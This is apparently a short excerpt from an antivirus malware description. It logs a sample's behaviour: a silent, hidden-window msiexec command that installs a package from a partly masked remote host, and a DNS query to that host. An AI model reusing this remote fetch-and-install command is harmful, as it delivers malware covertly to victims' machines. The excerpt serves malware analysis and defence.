Technical Information
- '<SYSTEM32>\msiexec.exe' serf=19 skip=1 /i http://of#####65advance.com/update /q OnStart='%WINDIR%\notepad.exe'
- DNS ASK of#####65advance.com
- '<SYSTEM32>\msiexec.exe' serf=19 skip=1 /i http://of#####65advance.com/update /q OnStart='%WINDIR%\notepad.exe'' (with hidden window)